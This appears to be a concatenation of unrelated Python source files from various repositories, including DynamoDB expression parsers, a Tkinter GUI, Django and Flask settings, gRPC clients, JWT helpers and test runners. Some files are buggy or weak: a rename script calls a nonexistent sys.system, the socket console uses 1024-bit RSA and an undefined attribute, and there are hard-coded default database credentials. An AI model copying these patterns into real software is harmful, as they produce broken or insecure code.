class UpdateExpressionRemoveActionParser(ExpressionParser):
"""
RemoveAction => Path = Value
So we create an UpdateExpressionSetAction Node that has 2 children. Left child Path and right child Value.
"""
@classmethod
def _is_possible_start(cls, token):
return UpdateExpressionPathParser.is_possible_start(token)
def _parse(self):
"""
UpdateExpressionRemoveActionParser only gets called when expecting a RemoveAction. So we should be aggressive on
raising invalid Tokens. We can thus do the following:
1) Process path
2) skip whitespace if there are any
"""
path, self.token_pos = UpdateExpressionPathParser(
**self._initializer_args()
)._parse_with_pos()
self.skip_white_space()
return UpdateExpressionRemoveAction(children=[path])
class UpdateExpressionAddClauseParser(ExpressionParser):
def _parse(self):
assert self.is_possible_start(self.get_next_token())
self.goto_next_significant_token()
ast, self.token_pos = UpdateExpressionAddActionsParser(
**self._initializer_args()
)._parse_with_pos()
# noinspection PyProtectedMember
return UpdateExpressionAddClause(children=[ast])
@classmethod
def _is_possible_start(cls, token):
return token.type == Token.ATTRIBUTE and token.value.upper() == "ADD"
class UpdateExpressionAddActionsParser(UpdateExpressionActionsParser):
"""
UpdateExpressionSetActions
"""
@classmethod
def _nested_expression_parser_class(cls):
return UpdateExpressionAddActionParser
@classmethod
def _nestable_class(cls):
return UpdateExpressionAddActions
@six.add_metaclass(abc.ABCMeta)
class UpdateExpressionPathValueParser(ExpressionParser):
def _parse_path_and_value(self):
"""
UpdateExpressionAddActionParser only gets called when expecting an AddAction. So we should be aggressive on
raising invalid Tokens. We can thus do the following:
1) Process path
2) skip whitespace if there are any
3) Process a value
4) skip whitespace if there are any
Returns:
[path, value]: A list containing the Path node and the AttributeValue nodes
"""
path, self.token_pos = UpdateExpressionPathParser(
**self._initializer_args()
)._parse_with_pos()
self.skip_white_space()
value, self.token_pos = UpdateExpressionAttributeValueParser(
**self._initializer_args()
)._parse_with_pos()
self.skip_white_space()
return [path, value]
class UpdateExpressionAddActionParser(UpdateExpressionPathValueParser):
@classmethod
def _is_possible_start(cls, token):
return UpdateExpressionPathParser.is_possible_start(token)
def _parse(self):
return UpdateExpressionAddAction(children=self._parse_path_and_value())
class UpdateExpressionDeleteClauseParser(ExpressionParser):
def _parse(self):
assert self.is_possible_start(self.get_next_token())
self.goto_next_significant_token()
ast, self.token_pos = UpdateExpressionDeleteActionsParser(
**self._initializer_args()
)._parse_with_pos()
# noinspection PyProtectedMember
return UpdateExpressionDeleteClause(children=[ast])
@classmethod
def _is_possible_start(cls, token):
return token.type == Token.ATTRIBUTE and token.value.upper() == "DELETE"
class UpdateExpressionDeleteActionsParser(UpdateExpressionActionsParser):
"""
UpdateExpressionSetActions
"""
@classmethod
def _nested_expression_parser_class(cls):
return UpdateExpressionDeleteActionParser
@classmethod
def _nestable_class(cls):
return UpdateExpressionDeleteActions
class UpdateExpressionDeleteActionParser(UpdateExpressionPathValueParser):
@classmethod
def _is_possible_start(cls, token):
return UpdateExpressionPathParser.is_possible_start(token)
def _parse(self):
return UpdateExpressionDeleteAction(children=self._parse_path_and_value())
| 2.484375 | 2 |
dftbplus_step/tk_optimization.py | molssi-seamm/dftbplus_step | 1 | 4932 | # -*- coding: utf-8 -*-
"""The graphical part of a DFTB+ Optimization node"""
import logging
import tkinter as tk
import tkinter.ttk as ttk
import dftbplus_step
logger = logging.getLogger(__name__)
class TkOptimization(dftbplus_step.TkEnergy):
def __init__(
self,
tk_flowchart=None,
node=None,
canvas=None,
x=120,
y=20,
w=200,
h=50,
my_logger=logger,
keyword_metadata=None,
):
"""Initialize the graphical Tk DFTB+ optimization step
Keyword arguments:
"""
self.results_widgets = []
super().__init__(
tk_flowchart=tk_flowchart,
node=node,
canvas=canvas,
x=x,
y=y,
w=w,
h=h,
my_logger=my_logger,
keyword_metadata=keyword_metadata,
)
def right_click(self, event):
"""Probably need to add our dialog..."""
super().right_click(event)
self.popup_menu.add_command(label="Edit..", command=self.edit)
self.popup_menu.tk_popup(event.x_root, event.y_root, 0)
def create_dialog(
self, title="Edit DFTB+ Optimization Step", calculation="optimization"
):
"""Create the dialog!"""
self.logger.debug("Creating the dialog")
super().create_dialog(title=title, calculation=calculation)
# Create all the widgets
P = self.node.parameters
# Frame to isolate widgets
opt_frame = self["optimization frame"] = ttk.LabelFrame(
self["frame"],
borderwidth=4,
relief="sunken",
text="Optimization Parameters",
labelanchor="n",
padding=10,
)
for key in dftbplus_step.OptimizationParameters.parameters:
self[key] = P[key].widget(opt_frame)
self.logger.debug("Finished creating the dialog")
def reset_dialog(self, widget=None):
super().reset_dialog()
row = 0
self["optimization frame"].grid(row=row, column=1, sticky=tk.EW)
row += 1
# And the widgets in our frame
self.reset_optimization_frame()
return row
def reset_optimization_frame(self):
"""Layout the optimization frame according to the current values.
SD CG gDIIS LBFGS FIRE
------------------ ------------------- ------------------- ------------------- --------
MovedAtoms MovedAtoms MovedAtoms MovedAtoms TimeStep
MaxForceComponent MaxForceComponent MaxForceComponent MaxForceComponent
MaxSteps MaxSteps MaxSteps MaxSteps
OutputPrefix OutputPrefix OutputPrefix OutputPrefix
AppendGeometries AppendGeometries AppendGeometries AppendGeometries
Constraints Constraints Constraints Constraints
LatticeOpt LatticeOpt LatticeOpt LatticeOpt
FixAngles FixAngles FixAngles FixAngles
FixLengths
Isotropic Isotropic Isotropic Isotropic
Pressure Pressure Pressure Pressure
MaxAtomStep MaxAtomStep MaxAtomStep
MaxLatticeStep MaxLatticeStep MaxLatticeStep MaxLatticeStep
ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly
StepSize Alpha Memory
Generations LineSearch
""" # noqa: E501
frame = self["optimization frame"]
for slave in frame.grid_slaves():
slave.grid_forget()
method = self["optimization method"].get()
widgets = []
widgets1 = []
row = 0
w = self["optimization method"]
w.grid(row=row, column=0, columnspan=2, sticky=tk.EW)
widgets.append(w)
row += 1
if method == "Steepest descents":
w = self["StepSize"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
elif "gDIIS" in method:
w = self["Alpha"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
w = self["Generations"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
elif "LBFGS" in method:
w = self["Memory"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
w = self["LineSearch"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
for widget in (
"MaxForceComponent",
"MaxSteps",
"MaxAtomStep",
"stop_if_scc_fails",
):
w = self[widget]
w.grid(row=row, column=0, columnspan=2, sticky=tk.EW)
widgets.append(w)
row += 1
return row
| 2.703125 | 3 |
console.py | aplneto/redes_projeto | 1 | 4933 | <filename>console.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Módulo de configuração dos consoles
"""
from Crypto.PublicKey import RSA
import socket
import os
import base64
class Console(object):
"""Superclasse Console
Classe base para os terminais de cliente e servidor.
Attributes:
logged (bool): True caso o usuário tenha realizado o login com sucesso,
False caso contrário
"""
def __init__(self, **kwargs):
"""Método construtor do console
Kwargs:
sock (socket): socket de comunicação
key_file (str): arquivo para inicialização de par de chaves
"""
self.sock = kwargs.get('sock',
socket.socket(socket.AF_INET,
socket.SOCK_STREAM))
key_file = kwargs.get('key_file', '')
if key_file:
self.privatekey, self.publickey = Console.start_key(key_file)
def run(self):
"""Método run difere entre o Console do Host e o do Client
O Método run controla o comportamento do objeto como um todo.
Todo o comportamento de um console individual deve ser definido dentro
do método run.
"""
raise NotImplemented
@staticmethod
def start_key(key_file):
"""Método de inicialização das chaves
Esse método inicializa a chave privada e prepara, também, a chave
pública para envio.
Args:
key_file (str): endereço do arquivo da chave privada
Returns:
(tuple) uma tupla contendo um par _RSAobj (chave privada) e byte
(inicializador da chave pública)
"""
try:
keyfile = open(key_file, 'rb')
except FileNotFoundError:
private_key = RSA.generate(1024)
else:
private_key = RSA.importKey(keyfile.read())
keyfile.close()
finally:
public_key = private_key.publickey().exportKey()
return private_key, public_key
def receive_key(self):
"""Troca de chaves no início da comunicação
Ao se conectarem, servidor e cliente trocam suas chaves públicas um com
o outro. Esse método retorna um objeto do tipo RSA público a partir da
chave pública recebida através de um socket.
Returns:
(_RSAobj) chave pública para criptografia.
"""
k = self.sock.recv(1024)
key = RSA.importKey(k)
return key
def send(self, msg):
"""Método send envia strings simples através do socket
O Método send é o método usado apara enviar mensagens simples através
de um socket. Dentro desse método ocorrem as criptografias RSA e base64
antes do envio."
Args:
msg (str ou bytes): mensagem a ser enviada
"""
msg = self.encrypt(msg)
self.sock.send(msg)
def receive(self, b = 160):
"""Método receive recebe mensagens simples através do socket
É através desse método que o usuário recebe mensagens simples através
do socket. As mensagens chegam criptografadas e a descriptografia
acontece dentro do método receive.
Args:
b (int): quantidade de bytes a serem recebidos
Returns:
(str) mensagem decifrada
"""
msg = self.decrypt(self.sock.recv(b))
return msg.decode('utf-8')
def encrypt(self, msg):
"""Criptografia de uma string ou trecho de bytes
Args:
msg (str ou bytes): string ou bytes a serem criptografados.
Returns:
(bytes) segmento de bytes criptografados
"""
if isinstance(msg, str):
msg = msg.encode('utf-8')
msg = self.publickey.encrypt(msg, 3.14159265359)
msg = base64.a85encode(msg[0])
return msg
def decrypt(self, msg):
"""Método de conversão de um trecho criptografado
Args:
msg (bytes): trecho de mensagem a ser decifrado
Returns:
(bytes): trecho de bytes decifrados
"""
msg = base64.a85decode(msg)
msg = self.privatekey.decrypt(msg)
return msg
def send_file(self, filename):
"""Rotina de envio de arquivos através de sockets
Esse método controla o envio sequencial de segmentos de um arquivo
através de um socket, gerando a cada envio um número inteiro referente
a quantidade de bytes enviados até o momento.
Método deve ser usado como um gerador. Veja exemplo abaixo.
Example:
for b in self.sendfile('alice.txt'):
if b == -1:
print("Houve um erro na transferência")
else:
print(str(b) + "de " str(file_size) "bytes enviados")
Args:
filename (str): endereço do arquivo
Yields:
(int) quantidade de bytes enviados ou -1, em caso de erro
"""
size = os.path.getsize(filename)
self.send(str(size))
sent = 0
file = open(filename, 'rb')
while sent < size:
ack = self.receive()
nxt = file.read(1024)
self.sock.send(nxt)
sent += len(nxt)
yield sent
file.close()
def receive_file(self, filename):
"""Rotina de recebimento de arquivos através de sockets
Esse método controla o recebeimendo de sementos de arquivos através de
um socket. O método gera a quantidade de bytes recebidos a cada nova
mensagem recebida do socket, por tanto, deve ser usado como um gerador.
Example:
for b in receive_file(filename):
print(str(b) + " de " str(filesize) " bytes recebidos.")
Args:
filename(str): nome do arquivo
Yields:
(int) quantidade de bytes recebidos
"""
size = int(self.receive())
file = open(filename, 'wb')
rcvd = 0
while rcvd < size:
self.send('ack')
nxt = self.sock.recv(1024)
rcvd += len(nxt)
file.write(nxt)
yield rcvd
file.close()
def __repr__(self):
return "{0}({1}, {2}, key_file = {3})".format(self.__class__.__name__,
self.sock.__repr__(), self.client.__repr__(),
repr(self.key_file)) | 3.125 | 3 |
sandbox/settings.py | OmenApps/marion | 0 | 4934 | <filename>sandbox/settings.py<gh_stars>0
"""
Django settings for marion project.
"""
from pathlib import Path
from tempfile import mkdtemp
from configurations import Configuration, values
BASE_DIR = Path(__file__).parent.resolve()
DATA_DIR = Path("/data")
# pylint: disable=no-init
class Base(Configuration):
"""
This is the base configuration every configuration (aka environnement)
should inherit from. It is recommended to configure third-party
applications by creating a configuration mixins in ./configurations and
compose the Base configuration with those mixins.
It depends on an environment variable that SHOULD be defined:
* DJANGO_SECRET_KEY
You may also want to override default configuration by setting the
following environment variables:
* DB_NAME
* DB_HOST
* DB_PASSWORD
* DB_USER
"""
DEBUG = False
# Security
ALLOWED_HOSTS = []
SECRET_KEY = values.Value(None)
# SECURE_PROXY_SSL_HEADER allows to fix the scheme in Django's HttpRequest
# object when you application is behind a reverse proxy.
#
# Keep this SECURE_PROXY_SSL_HEADER configuration only if :
# - your Django app is behind a proxy.
# - your proxy strips the X-Forwarded-Proto header from all incoming requests
# - Your proxy sets the X-Forwarded-Proto header and sends it to Django
#
# In other cases, you should comment the following line to avoid security issues.
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": (
"django.contrib.auth.password_validation."
"UserAttributeSimilarityValidator"
),
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Application
ROOT_URLCONF = "urls"
WSGI_APPLICATION = "wsgi.application"
# Database
DATABASES = {
"default": {
"ENGINE": values.Value(
"django.db.backends.postgresql_psycopg2",
environ_name="DB_ENGINE",
environ_prefix=None,
),
"NAME": values.Value("marion", environ_name="DB_NAME", environ_prefix=None),
"USER": values.Value("fun", environ_name="DB_USER", environ_prefix=None),
"PASSWORD": values.Value(
"pass", environ_name="DB_PASSWORD", environ_prefix=None
),
"HOST": values.Value(
"localhost", environ_name="DB_HOST", environ_prefix=None
),
"PORT": values.Value(5432, environ_name="DB_PORT", environ_prefix=None),
}
}
# Static files (CSS, JavaScript, Images)
STATIC_URL = "/static/"
STATIC_ROOT = DATA_DIR.joinpath("static")
MEDIA_URL = "/media/"
MEDIA_ROOT = DATA_DIR.joinpath("media")
# Internationalization
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"rest_framework",
"marion",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
class Development(Base):
"""
Development environment settings
We set DEBUG to True and configure the server to respond from all hosts.
"""
DEBUG = True
ALLOWED_HOSTS = ["*"]
ROOT_URLCONF = "urls.debug"
# Application definition
INSTALLED_APPS = Base.INSTALLED_APPS + [
"howard",
]
MARION_DOCUMENT_ISSUER_CHOICES_CLASS = "howard.defaults.DocumentIssuerChoices"
class Test(Base):
"""Test environment settings"""
MEDIA_ROOT = Path(mkdtemp())
ROOT_URLCONF = "urls.debug"
| 2.125 | 2 |
skywalking/client/grpc.py | cooolr/skywalking-python | 0 | 4935 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import grpc
from skywalking.protocol.common.Common_pb2 import KeyStringValuePair
from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub
from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub
from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties
from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub
from skywalking.protocol.profile.Profile_pb2 import ProfileTaskCommandQuery
from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub
from skywalking import config
from skywalking.client import ServiceManagementClient, TraceSegmentReportService, ProfileTaskChannelService, \
LogDataReportService
from skywalking.command import command_service
from skywalking.loggings import logger
from skywalking.profile import profile_task_execution_service
class GrpcServiceManagementClient(ServiceManagementClient):
def __init__(self, channel: grpc.Channel):
self.service_stub = ManagementServiceStub(channel)
def send_instance_props(self):
self.service_stub.reportInstanceProperties(InstanceProperties(
service=config.service_name,
serviceInstance=config.service_instance,
properties=[KeyStringValuePair(key='language', value='Python')],
))
def send_heart_beat(self):
logger.debug(
'service heart beats, [%s], [%s]',
config.service_name,
config.service_instance,
)
self.service_stub.keepAlive(InstancePingPkg(
service=config.service_name,
serviceInstance=config.service_instance,
))
class GrpcTraceSegmentReportService(TraceSegmentReportService):
def __init__(self, channel: grpc.Channel):
self.report_stub = TraceSegmentReportServiceStub(channel)
def report(self, generator):
self.report_stub.collect(generator)
class GrpcLogDataReportService(LogDataReportService):
def __init__(self, channel: grpc.Channel):
self.report_stub = LogReportServiceStub(channel)
def report(self, generator):
self.report_stub.collect(generator)
class GrpcProfileTaskChannelService(ProfileTaskChannelService):
def __init__(self, channel: grpc.Channel):
self.task_stub = ProfileTaskStub(channel)
def do_query(self):
query = ProfileTaskCommandQuery(
service=config.service_name,
serviceInstance=config.service_instance,
lastCommandTime=profile_task_execution_service.get_last_command_create_time()
)
commands = self.task_stub.getProfileTaskCommands(query)
command_service.receive_command(commands)
| 1.65625 | 2 |
coingate/migrations/0004_auto_20200207_1959.py | glitzybunny/coingate_sandbox_payment | 2 | 4936 | # Generated by Django 3.0.3 on 2020-02-07 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('coingate', '0003_auto_20200207_1513'),
]
operations = [
migrations.RemoveField(
model_name='payment',
name='token',
),
migrations.AddField(
model_name='payment',
name='expire_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='payment',
name='pay_amount',
field=models.DecimalField(blank=True, decimal_places=1, max_digits=10, null=True),
),
migrations.AddField(
model_name='payment',
name='payment_address',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='payment',
name='created_at',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AlterField(
model_name='payment',
name='price_currency',
field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='USD', max_length=10),
),
migrations.AlterField(
model_name='payment',
name='receive_currency',
field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='BTC', max_length=10),
),
migrations.AlterField(
model_name='payment',
name='status',
field=models.CharField(choices=[('new', 'Newly created invoice'), ('pending', 'Awaiting payment'), ('confirming', 'Awaiting blockchain network confirmation'), ('paid', 'Confirmed'), ('invalid', 'Rejected'), ('expired', 'Expired'), ('canceled', 'Canceled'), ('refunded', 'Refunded')], default='new', max_length=10),
),
]
| 1.648438 | 2 |
space_trace/__init__.py | SpaceTeam/space-event-trace | 2 | 4937 | import toml
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__, instance_relative_config=True)
app.config.from_file("config.toml", load=toml.load)
db = SQLAlchemy(app)
@app.before_first_request
def create_table():
db.create_all()
from space_trace import views, cli
| 2.3125 | 2 |
ng/distributions/Distribution.py | forons/noise-generator | 0 | 4938 | <filename>ng/distributions/Distribution.py<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from enum import Enum
from .NormalDist import NormalDist
from .UniformDist import UniformDist
class Distribution(Enum):
UNIFORM = 0
GAUSSIAN = 1
POISSON = 2
@staticmethod
def determine_distribution(distribution, distribution_params):
distribution_upper = distribution.upper()
if not Distribution[distribution_upper] or Distribution[distribution_upper] is None:
raise IndexError('Distribution not supported `{}`. Try one of: {}'.format(
distribution, [(elem.value, elem.name) for elem in Distribution]))
if Distribution[distribution_upper] == Distribution.UNIFORM:
if not distribution_params:
distribution_params = 0.5
return UniformDist(rate=float(distribution_params))
if Distribution[distribution_upper] == Distribution.GAUSSIAN:
if not distribution_params:
distribution_params = [0., 1.]
return NormalDist(loc=float(distribution_params[0]),
scale=float(distribution_params[1]))
if Distribution[distribution_upper] is Distribution.POISSON:
pass
raise IndexError('Distribution not supported `{}`. Try one of: {}'.format(
distribution, [(elem.value, elem.name) for elem in Distribution]))
| 2.921875 | 3 |
test/rename.py | Riteme/test | 3 | 4939 | import os
import sys
filename = sys.argv[1]
from_id = int(sys.argv[2])
to_id = int(sys.argv[2])
for i in range(from_id, to_id + 1):
sys.system("mv {0}.in{1} {0}{1}.in".format(filename, i))
sys.system("mv {0}.out{1} {0}{1}.out".format(filename, i))
| 2.609375 | 3 |
TransitPass/urls.py | Savior-19/Savior19 | 0 | 4940 | <gh_stars>0
from django.urls import path
from . import views
urlpatterns = [
path('apply/', views.FillPassApplication, name='transit-pass-application-form'),
path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'),
path('view-application-list/', views.DisplayApplicationList, name='view-application-list'),
path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'),
path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'),
path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'),
] | 1.625 | 2 |
dash_docs/chapters/dash_core_components/Textarea/examples/textarea_basic.py | kozo2/dash-docs | 1 | 4941 | import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc
app = dash.Dash(__name__)
app.layout = html.Div([
dcc.Textarea(
id='textarea-example',
value='Textarea content initialized\nwith multiple lines of text',
style={'width': '100%', 'height': 300},
),
html.Div(id='textarea-example-output', style={'whiteSpace': 'pre-line'})
])
@app.callback(
Output('textarea-example-output', 'children'),
[Input('textarea-example', 'value')]
)
def update_output(value):
return 'You have entered: \n{}'.format(value)
if __name__ == '__main__':
app.run_server(debug=True)
| 2.546875 | 3 |
tests/test_wrapped_driver.py | balexander85/wrapped_driver | 0 | 4942 | import pytest
from selenium.common.exceptions import WebDriverException
from wrapped_driver import WrappedDriver
def test_empty_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(WebDriverException):
WrappedDriver(executable_path="", headless=True)
def test_no_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(TypeError):
WrappedDriver(headless=True)
| 2.65625 | 3 |
eth/vm/forks/petersburg/blocks.py | ggs134/py-evm | 1,641 | 4943 | <reponame>ggs134/py-evm
from rlp.sedes import (
CountableList,
)
from eth.rlp.headers import (
BlockHeader,
)
from eth.vm.forks.byzantium.blocks import (
ByzantiumBlock,
)
from .transactions import (
PetersburgTransaction,
)
class PetersburgBlock(ByzantiumBlock):
transaction_builder = PetersburgTransaction
fields = [
('header', BlockHeader),
('transactions', CountableList(transaction_builder)),
('uncles', CountableList(BlockHeader))
]
| 1.789063 | 2 |
tests/runner.py | crnbaker/MONAI | 1 | 4944 | <reponame>crnbaker/MONAI
# Copyright 2020 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import inspect
import os
import sys
import time
import unittest
from monai.utils import PerfContext
results: dict = dict()
class TimeLoggingTestResult(unittest.TextTestResult):
"""Overload the default results so that we can store the results."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.timed_tests = dict()
def startTest(self, test): # noqa: N802
"""Start timer, print test name, do normal test."""
self.start_time = time.time()
name = self.getDescription(test)
self.stream.write(f"Starting test: {name}...\n")
super().startTest(test)
def stopTest(self, test): # noqa: N802
"""On test end, get time, print, store and do normal behaviour."""
elapsed = time.time() - self.start_time
name = self.getDescription(test)
self.stream.write(f"Finished test: {name} ({elapsed:.03}s)\n")
if name in results:
raise AssertionError("expected all keys to be unique")
results[name] = elapsed
super().stopTest(test)
def print_results(results, discovery_time, thresh, status):
# only keep results >= threshold
results = dict(filter(lambda x: x[1] > thresh, results.items()))
if len(results) == 0:
return
print(f"\n\n{status}, printing completed times >{thresh}s in ascending order...\n")
timings = dict(sorted(results.items(), key=lambda item: item[1]))
for r in timings:
if timings[r] >= thresh:
print(f"{r} ({timings[r]:.03}s)")
print(f"test discovery time: {discovery_time:.03}s")
print(f"total testing time: {sum(results.values()):.03}s")
print("Remember to check above times for any errors!")
def parse_args(default_pattern):
parser = argparse.ArgumentParser(description="Runner for MONAI unittests with timing.")
parser.add_argument(
"-s", action="store", dest="path", default=".", help="Directory to start discovery (default: '%(default)s')"
)
parser.add_argument(
"-p",
action="store",
dest="pattern",
default=default_pattern,
help="Pattern to match tests (default: '%(default)s')",
)
parser.add_argument(
"-t",
"--thresh",
dest="thresh",
default=10.0,
type=float,
help="Display tests longer than given threshold (default: %(default)d)",
)
parser.add_argument(
"-v",
"--verbosity",
action="store",
dest="verbosity",
type=int,
default=1,
help="Verbosity level (default: %(default)d)",
)
parser.add_argument("-q", "--quick", action="store_true", dest="quick", default=False, help="Only do quick tests")
parser.add_argument(
"-f", "--failfast", action="store_true", dest="failfast", default=False, help="Stop testing on first failure"
)
args = parser.parse_args()
print(f"Running tests in folder: '{args.path}'")
if args.pattern:
print(f"With file pattern: '{args.pattern}'")
return args
def get_default_pattern(loader):
signature = inspect.signature(loader.discover)
params = {k: v.default for k, v in signature.parameters.items() if v.default is not inspect.Parameter.empty}
return params["pattern"]
if __name__ == "__main__":
loader = unittest.TestLoader()
default_pattern = get_default_pattern(loader)
# Parse input arguments
args = parse_args(default_pattern)
# If quick is desired, set environment variable
if args.quick:
os.environ["QUICKTEST"] = "True"
# Get all test names (optionally from some path with some pattern)
with PerfContext() as pc:
tests = loader.discover(args.path, args.pattern)
discovery_time = pc.total_time
print(f"time to discover tests: {discovery_time}s")
test_runner = unittest.runner.TextTestRunner(
resultclass=TimeLoggingTestResult, verbosity=args.verbosity, failfast=args.failfast
)
# Use try catches to print the current results if encountering exception or keyboard interruption
try:
test_result = test_runner.run(tests)
print_results(results, discovery_time, args.thresh, "tests finished")
sys.exit(not test_result.wasSuccessful())
except KeyboardInterrupt:
print_results(results, discovery_time, args.thresh, "tests cancelled")
sys.exit(1)
except Exception:
print_results(results, discovery_time, args.thresh, "exception reached")
raise
| 2.453125 | 2 |
venv/Lib/site-packages/pandas/core/array_algos/transforms.py | arnoyu-hub/COMP0016miemie | 0 | 4945 | """
transforms.py is for shape-preserving functions.
"""
import numpy as np
def shift(values: np.ndarray, periods: int, axis: int, fill_value) -> np.ndarray:
new_values = values
if periods == 0 or values.size == 0:
return new_values.copy()
# make sure array sent to np.roll is c_contiguous
f_ordered = values.flags.f_contiguous
if f_ordered:
new_values = new_values.T
axis = new_values.ndim - axis - 1
if new_values.size:
new_values = np.roll(
new_values,
np.intp(periods),
axis=axis,
)
axis_indexer = [slice(None)] * values.ndim
if periods > 0:
axis_indexer[axis] = slice(None, periods)
else:
axis_indexer[axis] = slice(periods, None)
new_values[tuple(axis_indexer)] = fill_value
# restore original order
if f_ordered:
new_values = new_values.T
return new_values
| 3.046875 | 3 |
students/models/group.py | Stanislav-Rybonka/studentsdb | 1 | 4946 | <filename>students/models/group.py
from __future__ import unicode_literals
from django.db import models
from django.utils.translation import ugettext as _
class Group(models.Model):
"""
Group model
"""
title = models.CharField(max_length=256, blank=False, verbose_name=_('Name'))
leader = models.OneToOneField(
'Student', verbose_name=_('Leader'), blank=True, null=True, on_delete=models.SET_NULL)
notes = models.TextField(blank=True, verbose_name=_('Additional notices'))
class Meta(object):
verbose_name = _('Group')
verbose_name_plural = _('Groups')
def __str__(self):
if self.leader:
return '{} ({} {})'.format(
self.title, self.leader.first_name, self.leader.last_name)
else:
return '{}'.format(None)
| 2.296875 | 2 |
frontegg/baseConfig/identity_mixin.py | pinikeizman/python-sdk | 0 | 4947 | from abc import ABCMeta, abstractmethod
from frontegg.helpers.frontegg_urls import frontegg_urls
import typing
import jwt
import requests
from frontegg.helpers.logger import logger
from jwt import InvalidTokenError
class IdentityClientMixin(metaclass=ABCMeta):
__publicKey = None
@property
@abstractmethod
def vendor_session_request(self) -> requests.Session:
pass
@property
@abstractmethod
def should_refresh_vendor_token(self) -> bool:
pass
@abstractmethod
def refresh_vendor_token(self) -> None:
pass
def get_public_key(self) -> str:
if self.__publicKey:
return self.__publicKey
logger.info('could not find public key locally, will fetch public key')
reties = 0
while reties < 10:
try:
self.__publicKey = self.fetch_public_key()
return self.__publicKey
except Exception as e:
reties = reties + 1
logger.error(
'could not get public key from frontegg, retry number - ' + str(reties) + ', ' + str(e))
logger.error('failed to get public key in all retries')
def fetch_public_key(self) -> str:
if self.should_refresh_vendor_token:
self.refresh_vendor_token()
response = self.vendor_session_request.get(
frontegg_urls.identity_service['vendor_config'])
response.raise_for_status()
data = response.json()
return data.get('publicKey')
def decode_jwt(self, authorization_header, verify: typing.Optional[bool] = True):
if not authorization_header:
raise InvalidTokenError('Authorization headers is missing')
logger.debug('found authorization header: ' +
str(authorization_header))
jwt_token = authorization_header.replace('Bearer ', '')
if verify:
public_key = self.get_public_key()
logger.debug('got public key' + str(public_key))
decoded = jwt.decode(jwt_token, public_key, algorithms='RS256')
else:
decoded = jwt.decode(jwt_token, algorithms='RS256', verify=False)
logger.info('jwt was decoded successfully')
logger.debug('JWT value - ' + str(decoded))
return decoded
| 2.1875 | 2 |
splunk_sdk/action/v1beta2/gen_action_service_api.py | ianlee4/splunk-cloud-sdk-python | 12 | 4948 | <reponame>ianlee4/splunk-cloud-sdk-python
# coding: utf-8
# Copyright © 2021 Splunk, Inc.
#
